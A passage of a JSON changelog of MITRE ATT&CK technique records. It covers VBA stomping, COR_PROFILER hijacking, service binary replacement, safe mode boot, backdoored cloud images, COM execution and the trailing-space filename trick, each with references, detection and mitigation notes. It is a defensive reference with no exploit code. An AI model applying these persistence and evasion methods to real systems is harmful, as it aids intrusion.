If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/007", + "external_id": "T1564.007" + }, + { + "source_name": "FireEye VBA stomp Feb 2020", + "description": "Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html" + }, + { + "source_name": "Evil Clippy May 2019", + "description": "Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020.", + "url": "https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/" + }, + { + "source_name": "Microsoft _VBA_PROJECT Stream", + "description": "Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020.", + "url": "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239" + }, + { + "source_name": "Walmart Roberts Oct 2018", + "description": "Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping \u2014 Advanced Maldoc Techniques. Retrieved September 17, 2020.", + "url": "https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278" + }, + { + "source_name": "pcodedmp Bontchev", + "description": "Bontchev, V. (2019, July 30). 
pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.", + "url": "https://github.com/bontchev/pcodedmp" + }, + { + "source_name": "oletools toolkit", + "description": "decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020.", + "url": "https://github.com/decalage2/oletools" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Rick Cole, Mandiant" + ], + "x_mitre_data_sources": [ + "File: File Metadata", + "Script: Script Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)\n\nIf the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. 
For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:00.627000+00:00\", \"old_value\": \"2025-04-15 19:59:06.926000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1042: Disable or Remove Feature or Program" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0012: Script (Script Execution)", + "DS0022: File (File Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-24 22:30:55.843000+00:00", + "modified": "2025-04-25 14:48:41.257000+00:00", + "name": "COR_PROFILER", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. 
System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/012", + "external_id": "T1574.012" + }, + { + "source_name": "Microsoft Profiling Mar 2017", + "description": "Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview" + }, + { + "source_name": "Microsoft COR_PROFILER Feb 2013", + "description": "Microsoft. 
(2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020.", + "url": "https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)" + }, + { + "source_name": "RedCanary Mockingbird May 2020", + "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.", + "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/" + }, + { + "source_name": "Red Canary COR_PROFILER May 2020", + "description": "Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020.", + "url": "https://redcanary.com/blog/cor_profiler-for-persistence/" + }, + { + "source_name": "Almond COR_PROFILER Apr 2019", + "description": "Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020.", + "url": "https://offsec.almond.consulting/UAC-bypass-dotnet.html" + }, + { + "source_name": "GitHub OmerYa Invisi-Shell", + "description": "Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020.", + "url": "https://github.com/OmerYa/Invisi-Shell" + }, + { + "source_name": "subTee .NET Profilers May 2017", + "description": "Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. 
Retrieved June 24, 2020.", + "url": "https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jesse Brown, Red Canary" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Windows Registry: Windows Registry Key Modification", + "Module: Module Load", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. 
For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:41.257000+00:00\", \"old_value\": \"2025-04-15 19:59:25.301000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1018: User Account Management", + "M1024: Restrict Registry Permissions", + "M1038: Execution Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0011: Module (Module Load)", + "DS0017: Command (Command Execution)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-12 20:43:53.998000+00:00", + "modified": "2025-04-25 14:47:32.419000+00:00", + "name": "Services File Permissions Weakness", + "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. 
If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/010", + "external_id": "T1574.010" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Stefan Kanthak" + ], + "x_mitre_data_sources": [ + "File: File Modification", + "File: File Creation", + "Process: Process Creation", + "Service: Service Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. 
Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:32.419000+00:00\", \"old_value\": \"2025-04-16 20:37:18.533000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1018: User Account Management", + "M1047: Audit", + "M1052: User Account Control" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0019: Service (Service Metadata)", + "DS0022: File (File Creation)", + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-23 20:00:27.600000+00:00", + "modified": "2025-04-25 14:46:08.076000+00:00", + "name": "Safe Mode Boot", + "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. 
It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/009", + "external_id": "T1562.009" + }, + { + "source_name": "Microsoft Safe Mode", + "description": "Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021.", + "url": "https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234" + }, + { + "source_name": "Sophos Snatch Ransomware 2019", + "description": "Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021.", + "url": "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/" + }, + { + "source_name": "Microsoft bcdedit 2021", + "description": "Microsoft. (2021, May 27). bcdedit. 
Retrieved June 23, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit" + }, + { + "source_name": "CyberArk Labs Safe Mode 2016", + "description": "Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.", + "url": "https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise" + }, + { + "source_name": "Cybereason Nocturnus MedusaLocker 2020", + "description": "Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021.", + "url": "https://www.cybereason.com/blog/medusalocker-ransomware" + }, + { + "source_name": "BleepingComputer REvil 2021", + "description": "Abrams, L. (2021, March 19). REvil ransomware has a new \u2018Windows Safe Mode\u2019 encryption mode. Retrieved June 23, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/" + }, + { + "source_name": "Microsoft Bootcfg", + "description": "Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021.", + "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jorell Magtibay, National Australia Bank Limited", + "Kiyohito Yamamoto, RedLark, NTT Communications", + "Yusuke Kubo, RedLark, NTT Communications" + ], + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Creation", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Modification", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor Registry modification and additions for services that may start on safe mode. 
For example, a program can be forced to start on safe mode boot by adding a \\* in front of the \"Startup\" value name: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[\"\\*Startup\"=\"{Path}\"] or by adding a key to HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)\n\nMonitor execution of processes and commands associated with making configuration changes to boot settings, such as bcdedit.exe and bootcfg.exe.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:08.076000+00:00\", \"old_value\": \"2025-04-15 19:58:15.415000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1054: Software Configuration" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0024: Windows Registry (Windows Registry Key Creation)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-04 12:04:03.552000+00:00", + "modified": "2025-04-25 15:15:30.983000+00:00", + "name": "Implant Internal Image", + "description": "Adversaries may implant cloud or container images with malicious code to establish persistence after 
gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim\u2019s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n\nA tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1525", + "external_id": "T1525" + }, + { + "source_name": "Rhino Labs Cloud Image Backdoor Technique Sept 2019", + "description": "Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.", + "url": "https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/" + }, + { + "source_name": "Rhino Labs Cloud Backdoor September 2019", + "description": "Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). 
Retrieved September 12, 2019.", + "url": "https://github.com/RhinoSecurityLabs/ccat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Yossi Weizman, Azure Defender Research Team", + "Vishwas Manral, McAfee", + "Praetorian" + ], + "x_mitre_data_sources": [ + "Image: Image Metadata", + "Image: Image Creation", + "Image: Image Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.\n\nIn containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Containers" + ], + "x_mitre_version": "2.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:30.983000+00:00\", \"old_value\": \"2025-04-15 19:58:29.793000+00:00\"}}}", + "previous_version": "2.2", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1045: Code Signing", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0007: Image (Image Creation)", + "DS0007: Image (Image Metadata)", + "DS0007: Image (Image Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-12 14:09:53.107000+00:00", + "modified": "2025-04-25 14:46:14.161000+00:00", + "name": "Component 
Object Model", + "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1559/001", + "external_id": "T1559.001" + }, + { + "source_name": "Fireeye Hunting COM June 2019", + "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html" + }, + { + "source_name": "Microsoft COM", + "description": "Microsoft. (n.d.). 
Component Object Model (COM). Retrieved November 22, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx" + }, + { + "source_name": "ProjectZero File Write EoP Apr 2018", + "description": "Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 3, 2018.", + "url": "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html" + }, + { + "source_name": "Enigma Outlook DCOM Lateral Movement Nov 2017", + "description": "Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/" + }, + { + "source_name": "Enigma MMC20 COM Jan 2017", + "description": "Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Module: Module Load", + "Script: Script Execution", + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. 
", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:14.161000+00:00\", \"old_value\": \"2025-04-15 19:58:18.425000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1048: Application Isolation and Sandboxing" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0011: Module (Module Load)", + "DS0012: Script (Script Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-10 20:47:10.082000+00:00", + "modified": "2025-04-25 14:48:22.412000+00:00", + "name": "Space after Filename", + "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). 
However, if the file is renamed to evil.txt (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036/006", + "external_id": "T1036.006" + }, + { + "source_name": "Mac Backdoors are back", + "description": "Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.", + "url": "https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Erye Hernandez, Palo Alto Networks" + ], + "x_mitre_data_sources": [ + "File: File Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. 
Processes executed from binaries containing non-standard extensions in the filename are suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:22.412000+00:00\", \"old_value\": \"2025-04-16 20:37:22.189000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-16 18:42:20.734000+00:00", + "modified": "2025-04-25 14:45:42.495000+00:00", + "name": "Revert Cloud Instance", + "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. 
